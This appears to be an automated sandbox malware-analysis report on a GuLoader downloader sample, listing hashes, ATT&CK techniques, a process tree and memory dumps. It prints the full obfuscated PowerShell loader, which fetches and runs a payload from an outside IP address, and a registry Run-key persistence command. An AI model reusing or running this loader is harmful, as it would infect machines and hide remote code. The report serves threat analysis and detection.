guloader | 813142e22c4d2a79a49e1f96a9bea8b14e13a67eb9d35922b5ac0b88b33aec6a

General

Target

rOferta_SKGNMECLemnedefinitionen353523577.wsf
Size

17KB
MD5

ed7122bfc1517425a483908cff86d950
SHA1

d71986894ac69f6958f3e126bec9eaabea50fa5c
SHA256

813142e22c4d2a79a49e1f96a9bea8b14e13a67eb9d35922b5ac0b88b33aec6a
SHA512

2fae96a3d31de6195ddf196d1b4abd2c1a7564347805838f701e328ef2a823462c45d09232d7ddecd7bacacec5652808194e77c2f8f674d06cc4a61a34976636
SSDEEP

384:vxuMLgrXuO5tyVsCouP+fVMD0BoqPrLjibxqWW4ZxQbIeMgJQc+Nzuz:vxtVOvyn3P+fC6fXji3+MNS

Score

10^/10

guloader downloader persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 2668 powershell.exe

flow	pid	process
4	2668	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\nyerhvervelsen = "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\\Weariest\\').Amperian;%Impopular% ($monotonicity)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

wab.exe

pid process

2708 wab.exe
2708 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2408 powershell.exe
2708 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2408 set thread context of 2708 2408 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2928 reg.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exe

pid process

2668 powershell.exe
2408 powershell.exe
2408 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2408 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2668 powershell.exe
Token: SeDebugPrivilege 2408 powershell.exe

pid	process
2708	wab.exe
2708	wab.exe

pid	process
2408	powershell.exe
2708	wab.exe

description	pid	process	target process
PID 2408 set thread context of 2708	2408	powershell.exe	wab.exe

pid	process
2928	reg.exe

pid	process
2668	powershell.exe
2408	powershell.exe
2408	powershell.exe

pid	process
2408	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2668	powershell.exe
Token: SeDebugPrivilege	2408	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

WScript.exepowershell.exepowershell.exewab.execmd.exe

description	pid	process	target process
PID 1948 wrote to memory of 2668	1948	WScript.exe	powershell.exe
PID 1948 wrote to memory of 2668	1948	WScript.exe	powershell.exe
PID 1948 wrote to memory of 2668	1948	WScript.exe	powershell.exe
PID 2668 wrote to memory of 2580	2668	powershell.exe	cmd.exe
PID 2668 wrote to memory of 2580	2668	powershell.exe	cmd.exe
PID 2668 wrote to memory of 2580	2668	powershell.exe	cmd.exe
PID 2668 wrote to memory of 2408	2668	powershell.exe	powershell.exe
PID 2668 wrote to memory of 2408	2668	powershell.exe	powershell.exe
PID 2668 wrote to memory of 2408	2668	powershell.exe	powershell.exe
PID 2668 wrote to memory of 2408	2668	powershell.exe	powershell.exe
PID 2408 wrote to memory of 2396	2408	powershell.exe	cmd.exe
PID 2408 wrote to memory of 2396	2408	powershell.exe	cmd.exe
PID 2408 wrote to memory of 2396	2408	powershell.exe	cmd.exe
PID 2408 wrote to memory of 2396	2408	powershell.exe	cmd.exe
PID 2408 wrote to memory of 2708	2408	powershell.exe	wab.exe
PID 2408 wrote to memory of 2708	2408	powershell.exe	wab.exe
PID 2408 wrote to memory of 2708	2408	powershell.exe	wab.exe
PID 2408 wrote to memory of 2708	2408	powershell.exe	wab.exe
PID 2408 wrote to memory of 2708	2408	powershell.exe	wab.exe
PID 2408 wrote to memory of 2708	2408	powershell.exe	wab.exe
PID 2708 wrote to memory of 2744	2708	wab.exe	cmd.exe
PID 2708 wrote to memory of 2744	2708	wab.exe	cmd.exe
PID 2708 wrote to memory of 2744	2708	wab.exe	cmd.exe
PID 2708 wrote to memory of 2744	2708	wab.exe	cmd.exe
PID 2744 wrote to memory of 2928	2744	cmd.exe	reg.exe
PID 2744 wrote to memory of 2928	2744	cmd.exe	reg.exe
PID 2744 wrote to memory of 2928	2744	cmd.exe	reg.exe
PID 2744 wrote to memory of 2928	2744	cmd.exe	reg.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\rOferta_SKGNMECLemnedefinitionen353523577.wsf"
1⤵
- Suspicious use of WriteProcessMemory
PID:1948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'Flex$B.rggJentlMatroAnkybSigraKommlSk,l:ChesNtripeImpodTugtlTernaBraig Pirt Mar=Lab.(StanTRidge Fres S mtTotr-We dPs laaNonetSov htame M.tr$Dis,Oevanv,heieTmm rOpstf F.oeDiseaRoomrRubefWarluSodalBa lnTviveEndos Pins Sth7supe9Gru.) U.d ');while (!$Nedlagt) {Bussemnd (Sarpedon ' For$CajugPiral rihoAnstbCampaRhodl and:tidsJ Fe eSissrDragnH stgpro,iDelstPolttPon eDocorVidesEksteTernnFor gSv.neSolen AnceMe a=Cog.$ B it SchrSrstu PepeRed, ') ;Bussemnd $fantasises;Bussemnd (Sarpedon 'StatS WortByggaxen.r ,tat Rej-PokeSTumol aueRefreSmaapOnom Lsm.4Demo ');Bussemnd (Sarpedon ',roi$Tyf gmuzzlAnfao.ptib SonaCocclS,iv:SyssNShrieMed dF,eklOmflaappegA.but lem=Raag(Pse.TConseAnnss Duetgast-DeliPFoneaKapitA.kehhusk Dy.k$ proODiskvImmueHundrSub,fmilieUninaHei rGoalf ,efu,rbelPensnNe rebedss.pers.osn7tach9Mona) De ') ;Bussemnd (Sarpedon ' Bis$ ontg cutlPoecojgerbTrekaDaimlRegr:SlgtS FruyGildn.ulpiTof,nTubbgYohisApadh NedaMnstlmisclLyseeBelerCommnDia,eTynd=B ne$EucrgAfstllunaoEndob YaraChail fe,:Ta,dKMor,abraveDeltmR.gnpBegrehelboSnipeAntir.uncnBygge Lav+Chad+Hypo%M rg$PereSFl pt StarRingeT,ppnSkbngStr eBestkIsraoDi.qr Hete rdnN ale Kap.BlokcTommoTempu UmanDdfdt Cam ') ;$skppeskn=$Strengekorene[$Syningshallerne];}Bussemnd (Sarpedon 'Shal$DespgCorol FodoNonpb AbdaSemilmoda: TviCFortoAbsemvi.upS,leoParanModieSupen KirtHi maChecl rav .os=Cory LaroGSlogeOenst Com-MiceCEl.aoBemjn ,nttLefteSt.mnTr.btOrds Ditm$AcoeOStrevEpiceJoggrudstfBereeVensaH,ndrH.idfalaruBetilViabnVindeR,ffscoprs,eka7Fore9 Fle ');Bussemnd (Sarpedon ' Uni$ mycgin slMiniolivebFl ea UnelTand:R.liO VisvIsoleDek.rSocisLnpaeC lln slisUdsgiZo.rbAfs.l.ugmeLdre Coun=Lave Marl[UndeSCreayG.nes ,fstPl.seNglem.lev..oluC .uboSovjn.onivCypre OxirPa,ttSkov]foed:Omsk: garFFordrPillo ThemAphoBOxycaJ,nnsButtePape6card4 .msSTjentEfterForsiCalan AntgWhos(Iagt$ KakCChanoHeuamUntrp Couo Ma nEgnseB.ugn Plat S.raForrl .om)Real ');Bussemnd (Sarpedon 'Invu$ bifg Su,lPar,oTritbparaaVejblAn e:GodtNcurioSkamnThi,d GeniJulelUnsiaEcontFrenaStrkbMattlOut e Hor Skor= Skj Dite[FornSThioyhiersDi.it lite Aurmford.Did TLayseDelixP.ritTomo. CorECon.n.lencPlotoFuncdPyrgi Fl nI.eagA.ti]Kryd:Star: lokABoobSParsCMo,eI Ly,IOpt,.PedeGRuthepanct StiSAurotPublr AmbiNonbnIch g Bef(Chyl$.andOSkyfvFrijePinkr .jes DiaeLouvn omps.amoi,houbDe tl B teIsoc)Genu ');Bussemnd (Sarpedon ' Pen$Provg.laylImproLibebTryka s rlInte:Cen DSkovaAscacoutftUbesy UnplAnaloMaimn EksovermmR,styLavi2Lu.r0Deni4Gul,=Stop$UredNMakaoGor.nK.lidRo.tiSy tlSo.aaNonitE,teaReprb NonlParaeN.bl.De isi.dau DiabStibsB.llt manr N,ni He nSureg Nem(Takk2 sti8Absa0Vire4,ami5Equi6Forl, Boo2 L.p7 The2 Kli2skgl5 .ag)Frui ');Bussemnd $Dactylonomy204;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2668

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $"
3⤵
PID:2580

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'Flex$B.rggJentlMatroAnkybSigraKommlSk,l:ChesNtripeImpodTugtlTernaBraig Pirt Mar=Lab.(StanTRidge Fres S mtTotr-We dPs laaNonetSov htame M.tr$Dis,Oevanv,heieTmm rOpstf F.oeDiseaRoomrRubefWarluSodalBa lnTviveEndos Pins Sth7supe9Gru.) U.d ');while (!$Nedlagt) {Bussemnd (Sarpedon ' For$CajugPiral rihoAnstbCampaRhodl and:tidsJ Fe eSissrDragnH stgpro,iDelstPolttPon eDocorVidesEksteTernnFor gSv.neSolen AnceMe a=Cog.$ B it SchrSrstu PepeRed, ') ;Bussemnd $fantasises;Bussemnd (Sarpedon 'StatS WortByggaxen.r ,tat Rej-PokeSTumol aueRefreSmaapOnom Lsm.4Demo ');Bussemnd (Sarpedon ',roi$Tyf gmuzzlAnfao.ptib SonaCocclS,iv:SyssNShrieMed dF,eklOmflaappegA.but lem=Raag(Pse.TConseAnnss Duetgast-DeliPFoneaKapitA.kehhusk Dy.k$ proODiskvImmueHundrSub,fmilieUninaHei rGoalf ,efu,rbelPensnNe rebedss.pers.osn7tach9Mona) De ') ;Bussemnd (Sarpedon ' Bis$ ontg cutlPoecojgerbTrekaDaimlRegr:SlgtS FruyGildn.ulpiTof,nTubbgYohisApadh NedaMnstlmisclLyseeBelerCommnDia,eTynd=B ne$EucrgAfstllunaoEndob YaraChail fe,:Ta,dKMor,abraveDeltmR.gnpBegrehelboSnipeAntir.uncnBygge Lav+Chad+Hypo%M rg$PereSFl pt StarRingeT,ppnSkbngStr eBestkIsraoDi.qr Hete rdnN ale Kap.BlokcTommoTempu UmanDdfdt Cam ') ;$skppeskn=$Strengekorene[$Syningshallerne];}Bussemnd (Sarpedon 'Shal$DespgCorol FodoNonpb AbdaSemilmoda: TviCFortoAbsemvi.upS,leoParanModieSupen KirtHi maChecl rav .os=Cory LaroGSlogeOenst Com-MiceCEl.aoBemjn ,nttLefteSt.mnTr.btOrds Ditm$AcoeOStrevEpiceJoggrudstfBereeVensaH,ndrH.idfalaruBetilViabnVindeR,ffscoprs,eka7Fore9 Fle ');Bussemnd (Sarpedon ' Uni$ mycgin slMiniolivebFl ea UnelTand:R.liO VisvIsoleDek.rSocisLnpaeC lln slisUdsgiZo.rbAfs.l.ugmeLdre Coun=Lave Marl[UndeSCreayG.nes ,fstPl.seNglem.lev..oluC .uboSovjn.onivCypre OxirPa,ttSkov]foed:Omsk: garFFordrPillo ThemAphoBOxycaJ,nnsButtePape6card4 .msSTjentEfterForsiCalan AntgWhos(Iagt$ KakCChanoHeuamUntrp Couo Ma nEgnseB.ugn Plat S.raForrl .om)Real ');Bussemnd (Sarpedon 'Invu$ bifg Su,lPar,oTritbparaaVejblAn e:GodtNcurioSkamnThi,d GeniJulelUnsiaEcontFrenaStrkbMattlOut e Hor Skor= Skj Dite[FornSThioyhiersDi.it lite Aurmford.Did TLayseDelixP.ritTomo. CorECon.n.lencPlotoFuncdPyrgi Fl nI.eagA.ti]Kryd:Star: lokABoobSParsCMo,eI Ly,IOpt,.PedeGRuthepanct StiSAurotPublr AmbiNonbnIch g Bef(Chyl$.andOSkyfvFrijePinkr .jes DiaeLouvn omps.amoi,houbDe tl B teIsoc)Genu ');Bussemnd (Sarpedon ' Pen$Provg.laylImproLibebTryka s rlInte:Cen DSkovaAscacoutftUbesy UnplAnaloMaimn EksovermmR,styLavi2Lu.r0Deni4Gul,=Stop$UredNMakaoGor.nK.lidRo.tiSy tlSo.aaNonitE,teaReprb NonlParaeN.bl.De isi.dau DiabStibsB.llt manr N,ni He nSureg Nem(Takk2 sti8Absa0Vire4,ami5Equi6Forl, Boo2 L.p7 The2 Kli2skgl5 .ag)Frui ');Bussemnd $Dactylonomy204;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2408

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $"
4⤵
PID:2396

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2708

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)"
5⤵
- Suspicious use of WriteProcessMemory
PID:2744

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)"
6⤵
- Adds Run key to start application
- Modifies registry key
PID:2928

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\60OZOKDTHMZK8BFBTY68.temp
Filesize
7KB

MD5
40bdf8a7fc9ccc6c0e22471d582b532f

SHA1
81e70adf3b8841f9c95c4eb717be1cf7095eaba0

SHA256
50870c43d46e102b03bbcc2852b1e0c03bc0f3b82d38449088f5d7a219af8c12

SHA512
f6b0e3210ed1f1c87c7fe1418a1365ba423e58408a0c08893f62935c72687bee6d2d766107d17c815f34d2c19148a8cebb52127b39ebc57a18076b0a42eee69b

Download Submit
C:\Users\Admin\AppData\Roaming\Sneglefart.Glo
Filesize
400KB

MD5
aa8e1ff80b164e8028dfa9321e7a95a2

SHA1
f9b328c860083a3784219725ebd5690f5ba19027

SHA256
af2499c512c0a15453eb4e7ffe57aae14170e7a88cee0524a555bf65094b8018

SHA512
fac9f4e7c72b274e55ef2925d4be08f3c6de4798daf561433131ca47ba54dbc3d826e59130213f39487d46fc72be0b44f0981d389a87b1d9b6c1c8ab54d2431d

Download Submit
memory/2408-25-0x00000000057A0000-0x00000000057A1000-memory.dmp

Filesize
4KB

Download
memory/2408-42-0x0000000006710000-0x0000000008D8C000-memory.dmp

Filesize
38.5MB

Download
memory/2408-37-0x0000000006710000-0x0000000008D8C000-memory.dmp

Filesize
38.5MB

Download
memory/2408-31-0x00000000029C0000-0x0000000002A00000-memory.dmp

Filesize
256KB

Download
memory/2408-29-0x0000000073BC0000-0x000000007416B000-memory.dmp

Filesize
5.7MB

Download
memory/2408-14-0x0000000073BC0000-0x000000007416B000-memory.dmp

Filesize
5.7MB

Download
memory/2408-30-0x0000000077CC0000-0x0000000077D96000-memory.dmp

Filesize
856KB

Download
memory/2408-16-0x0000000073BC0000-0x000000007416B000-memory.dmp

Filesize
5.7MB

Download
memory/2408-17-0x00000000029C0000-0x0000000002A00000-memory.dmp

Filesize
256KB

Download
memory/2408-28-0x0000000077AD0000-0x0000000077C79000-memory.dmp

Filesize
1.7MB

Download
memory/2408-19-0x00000000029C0000-0x0000000002A00000-memory.dmp

Filesize
256KB

Download
memory/2408-27-0x0000000006710000-0x0000000008D8C000-memory.dmp

Filesize
38.5MB

Download
memory/2408-22-0x0000000006710000-0x0000000008D8C000-memory.dmp

Filesize
38.5MB

Download
memory/2408-15-0x00000000029C0000-0x0000000002A00000-memory.dmp

Filesize
256KB

Download
memory/2668-4-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

Filesize
2.9MB

Download
memory/2668-26-0x0000000002D60000-0x0000000002DE0000-memory.dmp

Filesize
512KB

Download
memory/2668-43-0x000007FEF6240000-0x000007FEF6BDD000-memory.dmp

Filesize
9.6MB

Download
memory/2668-24-0x0000000002D60000-0x0000000002DE0000-memory.dmp

Filesize
512KB

Download
memory/2668-20-0x000007FEF6240000-0x000007FEF6BDD000-memory.dmp

Filesize
9.6MB

Download
memory/2668-5-0x00000000021E0000-0x00000000021E8000-memory.dmp

Filesize
32KB

Download
memory/2668-23-0x0000000002D60000-0x0000000002DE0000-memory.dmp

Filesize
512KB

Download
memory/2668-7-0x0000000002D60000-0x0000000002DE0000-memory.dmp

Filesize
512KB

Download
memory/2668-9-0x0000000002D60000-0x0000000002DE0000-memory.dmp

Filesize
512KB

Download
memory/2668-6-0x000007FEF6240000-0x000007FEF6BDD000-memory.dmp

Filesize
9.6MB

Download
memory/2668-21-0x0000000002D60000-0x0000000002DE0000-memory.dmp

Filesize
512KB

Download
memory/2668-8-0x000007FEF6240000-0x000007FEF6BDD000-memory.dmp

Filesize
9.6MB

Download
memory/2708-35-0x0000000077CC0000-0x0000000077D96000-memory.dmp

Filesize
856KB

Download
memory/2708-34-0x0000000077CF6000-0x0000000077CF7000-memory.dmp

Filesize
4KB

Download
memory/2708-39-0x0000000077CC0000-0x0000000077D96000-memory.dmp

Filesize
856KB

Download
memory/2708-32-0x0000000001950000-0x0000000003FCC000-memory.dmp

Filesize
38.5MB

Download
memory/2708-38-0x0000000001950000-0x0000000003FCC000-memory.dmp

Filesize
38.5MB

Download
memory/2708-33-0x0000000077AD0000-0x0000000077C79000-memory.dmp

Filesize
1.7MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads